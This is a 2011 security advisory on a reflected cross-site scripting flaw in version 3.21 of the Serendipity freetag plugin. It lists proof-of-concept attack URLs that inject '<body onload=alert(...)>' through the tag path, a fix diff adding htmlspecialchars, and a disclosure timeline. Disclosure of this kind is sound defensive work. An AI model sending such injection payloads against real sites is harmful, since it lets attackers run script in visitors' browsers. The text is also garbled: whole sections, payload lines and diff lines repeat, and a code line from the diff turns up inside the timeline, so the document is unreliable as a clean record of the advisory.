SSCHADV2011-004 - Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory: | XSS vulnerability in Serendipity Plugin "serendipity_event_freetag" |
Advisory ID: | SSCHADV2011-004 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on: serendipity_event_freetag – version 3.21 |
Vendor URL: | http://www.s9y.org |
Vendor Status: |
Version 3.22 – Fix possible XSS
|
CVE-ID: | - |
======================
Vulnerability Description:
======================
This is a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
Vulnerability Description:
======================
This is a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
=====
Solution:
=====
Update to the latest version 3.22
Solution:
=====
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< $propbag->add(‘version’, ‘3.21’);
> $propbag->add(‘version’, ‘3.22’);
> $propbag->add(‘version’, ‘3.22’);
< $serendipity[‘smarty’]->assign(‘freetag_tagTitle’, is_array($this->displayTag) ? implode(’ + ‘,$this->displayTag) : $this->displayTag);
> $serendipity[‘smarty’]->assign(‘freetag_tagTitle’, htmlspecialchars(is_array($this->displayTag) ? implode(’ + ‘,$this->displayTag) : $this->displayTag));
================
Disclosure Timeline:
================
30-May-2011 – informed developers
> $serendipity[‘smarty’]->assign(‘freetag_tagTitle’, htmlspecialchars(is_array($this->displayTag) ? implode(’ + ‘,$this->displayTag) : $this->displayTag));
================
Disclosure Timeline:
================
30-May-2011 – informed developers
30-May-2011 – Release date of this security advisory
30-May-2011 – Version 3.22 – Fix possible XSS
30-May-2011 – Version 3.22 – Fix possible XSS
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org
Comments
Display comments as Linear | Threaded